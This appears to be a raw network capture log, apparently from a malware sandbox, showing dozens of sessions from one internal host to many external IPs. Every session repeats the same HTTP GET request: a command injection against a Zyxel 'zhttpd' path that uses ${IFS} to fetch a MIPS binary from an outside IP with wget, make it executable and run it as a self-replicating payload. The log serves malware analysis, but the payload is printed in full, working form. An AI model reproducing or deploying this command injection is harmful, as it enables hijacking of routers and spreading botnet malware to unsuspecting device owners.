                                            Jan 14, 2024 15:50:49.625298977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6959192.168.2.2336060108.124.94.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.625305891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6960192.168.2.2336044210.184.40.63443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.625360012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6961192.168.2.234559651.177.69.148443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.625364065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6962192.168.2.2348728186.114.169.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.625392914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6963192.168.2.235578417.170.98.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.625430107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6964192.168.2.2348494181.199.89.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.625442028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6965192.168.2.2356542104.151.8.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.625503063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6966192.168.2.233763048.140.97.234443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.625514984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6967192.168.2.2333134184.11.174.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.625540018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6968192.168.2.2339980154.72.200.201443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.625564098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6969192.168.2.234131840.56.17.83443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.625571966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6970192.168.2.235592217.191.119.127443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.625595093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6971192.168.2.2351232183.157.87.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.625662088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6972192.168.2.2336212222.243.234.8443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.625673056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6973192.168.2.234063290.119.47.88443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.625699043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6974192.168.2.235033858.231.127.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.625736952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6975192.168.2.2357982109.136.120.165443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.625758886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6976192.168.2.234687063.172.155.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.625786066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6977192.168.2.234898290.90.239.119443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.625806093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6978192.168.2.235860024.105.137.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.625837088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6979192.168.2.234576059.24.15.103443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.625864983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6980192.168.2.2340918104.14.96.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.625879049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6981192.168.2.233556237.44.192.45443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.625900030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6982192.168.2.2344896123.29.140.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.625951052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6983192.168.2.2353094142.110.139.137443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.625967026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6984192.168.2.2339504148.187.168.41443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.625993013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6985192.168.2.234680657.46.135.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626029968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6986192.168.2.233531853.184.75.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626039028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6987192.168.2.235616660.83.1.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626044035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6988192.168.2.235511631.70.18.139443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626068115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6989192.168.2.234971814.95.129.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626131058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6990192.168.2.2342104190.98.33.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626133919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6991192.168.2.234938427.231.80.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626166105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6992192.168.2.234160445.96.146.162443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626182079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6993192.168.2.233954697.127.210.65443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626240969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6994192.168.2.233830070.117.182.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626245975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6995192.168.2.235855671.105.7.136443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626291037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6996192.168.2.2333882203.228.200.90443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626321077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6997192.168.2.2353104108.253.13.165443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626336098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6998192.168.2.2346374129.51.13.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626348019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6999192.168.2.2334354131.81.91.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626383066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7000192.168.2.233294457.189.251.236443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626405954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7001192.168.2.235938695.225.223.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626435995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7002192.168.2.233719636.254.49.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626468897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7003192.168.2.235986089.121.108.66443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626508951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7004192.168.2.235441848.133.167.253443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626526117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7005192.168.2.234559057.226.11.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626558065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7006192.168.2.235105249.176.67.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626590967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7007192.168.2.2357774175.157.51.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626610994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7008192.168.2.233718447.113.246.151443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626632929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7009192.168.2.2339960103.56.228.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626666069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7010192.168.2.23446284.41.196.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626694918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7011192.168.2.233355481.43.250.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626698017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7012192.168.2.2352802181.181.92.175443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626714945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7013192.168.2.234103823.243.62.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626753092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7014192.168.2.234769654.136.149.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626761913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7015192.168.2.2337628203.66.160.162443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626780033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7016192.168.2.2346056191.58.55.155443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626789093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7017192.168.2.2357892168.91.217.250443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626831055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7018192.168.2.234273882.173.207.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626842976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7019192.168.2.2343014108.51.28.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626869917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7020192.168.2.2339886143.36.57.161443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626885891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7021192.168.2.233885051.120.100.142443
                                            TimestampBytes transferredDirectionData
